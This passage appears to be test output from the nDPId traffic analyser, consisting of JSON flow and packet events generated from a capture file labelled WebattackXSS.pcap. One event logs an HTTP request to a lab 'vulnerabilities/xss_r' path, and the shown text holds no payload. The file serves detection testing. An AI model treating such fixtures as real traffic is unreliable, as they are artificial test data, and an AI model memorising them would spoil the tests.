-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347608596,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347608596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UBJAAD4Gdb6sEAABwKgKMuaIAFDT6AnDAAAAAKACchA\/cwAAAgQFtAQCCAoBO1nRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":2,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5oh16C+h0+gJxKAScSBrnQAAAgQFtAQCCAoD5StGATtZ0QEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":3,"flow_last_seen":1499347608597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347608597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UBNAAD4GdcWsEAABwKgKMuaIAFDT6AnEdegvooAQAOUKpQAAAQEICgE7WdED5StG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347611162,"flow_last_seen":1499347611162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347611162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1499347611162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8at5AAD4GWvKsEAABwKgKMuaiAFBCbDaMAAAAAKACchChiwAAAgQFtAQCCAoBO1xSAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":2,"flow_last_seen":1499347611162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5qKcQtTMQmw2jaAScSD\/rQAAAgQFtAQCCAoD5S3IATtcUgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":3,"flow_last_seen":1499347611163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347611163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0at9AAD4GWvmsEAABwKgKMuaiAFBCbDaNnELUzYAQAOWetAAAAQEICgE7XFMD5S3I"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347612465,"flow_last_seen":1499347612465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347612465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1499347612465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dipAAD4GT6asEAABwKgKMuawAFAlJSuyAAAAAKACchDIWAAAAgQFtAQCCAoBO12YAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":2,"flow_last_seen":1499347612466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5rAZOYT0JSUrs6AScSD4FwAAAgQFtAQCCAoD5S8NATtdmAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":3,"flow_last_seen":1499347612467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347612467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ditAAD4GT62sEAABwKgKMuawAFAlJSuzGTmE9YAQAOWXHgAAAQEICgE7XZkD5S8N"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347613718,"flow_last_seen":1499347613718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347613718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1499347613718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613718,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VmlAAD4Gb2esEAABwKgKMua+AFCqCgi7AAAAAKACchBlIgAAAgQFtAQCCAoBO17SAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":2,"flow_last_seen":1499347613719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5r4KHPZlqgoIvKAScSAxUwAAAgQFtAQCCAoD5TBHATte0gEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":3,"flow_last_seen":1499347613719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347613719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VmpAAD4Gb26sEAABwKgKMua+AFCqCgi8Chz2ZoAQAOXQWgAAAQEICgE7XtID5TBH"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347616210,"flow_last_seen":1499347616210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347616210,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1499347616210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YLdAAD4GZRmsEAABwKgKMubYAFBJnwH3AAAAAKACchDJyQAAAgQFtAQCCAoBO2FAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":2,"flow_last_seen":1499347616211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5thWFuJlSZ8B+KAScSBbkQAAAgQFtAQCCAoD5TK2ATthQAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":3,"flow_last_seen":1499347616212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347616212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YLhAAD4GZSCsEAABwKgKMubYAFBJnwH4VhbiZoAQAOX6lwAAAQEICgE7YUED5TK2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347617491,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDpAAD4GcZasEAABwKgKMubmAFD8gja7AAAAAKACchDg0gAAAgQFtAQCCAoBO2KBAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":2,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ubMDNHo\/II2vKAScSAL4QAAAgQFtAQCCAoD5TP2ATtigQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":3,"flow_last_seen":1499347617492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347617492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDtAAD4GcZ2sEAABwKgKMubmAFD8gja8zAzR6YAQAOWq6AAAAQEICgE7YoED5TP2"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347618757,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347618757,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UcRAAD4GdAysEAABwKgKMub0AFCevDJ5AAAAAKACchBBkQAAAgQFtAQCCAoBO2O9AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":2,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5vRXo2m0nrwyeqAScSBIAQAAAgQFtAQCCAoD5TUyATtjvQEDAwc="} 